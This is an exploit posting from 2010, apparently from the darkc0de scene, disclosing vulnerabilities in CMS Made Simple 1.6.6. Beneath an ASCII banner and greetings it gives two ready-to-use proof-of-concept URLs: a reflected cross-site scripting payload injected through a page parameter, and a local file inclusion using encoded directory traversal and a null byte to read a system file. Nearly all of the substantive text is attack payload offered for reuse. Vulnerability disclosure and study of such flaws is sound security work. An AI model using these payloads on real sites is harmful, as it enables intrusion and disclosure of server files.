cmsmadesimple-lfixss.txt
Posted on 12 February 2010
################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ _ __| _/____ # # / __ |\__ \_ __ |/ // ___/ /_ / __ |/ __ # # / /_/ | / __ | | / < \___ \_/ / /_/ ___/ # # \____ |(______/__| |__|_ \_____>\_____ /\_____|\____ # # / / / # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ / / / # # \___| | / ___/ / # # \___ >__| \___ >/\_/ # # est.2007 / / forum.darkc0de.com # ################################################################ # Greetz to all Darkc0de ,AI,ICW, AH Memebers # Shoutz to r45c4l,j4ckh4x0r,silic0n,smith,baltazar,d3hydr8,FB1H2S, lowlz,Eberly,Sumit, # # Author: Beenu Arora # # Home : www.BeenuArora.com # # Email : beenudel1986@gmail.com # # Share the c0de! # ################################################################ # # Exploit: Multiple Vulnerablities in cmsmadesimple # # AppSite: http://www.cmsmadesimple.com/ # # Tested Version : 1.6.6 # XSS # # POC:-http://localhost/cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false"><script>alert('XSS')</script> # # # # Multiple Local File Inclusion # # Sample URL: # POC:-http://localhost:80/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39 # # ################################################################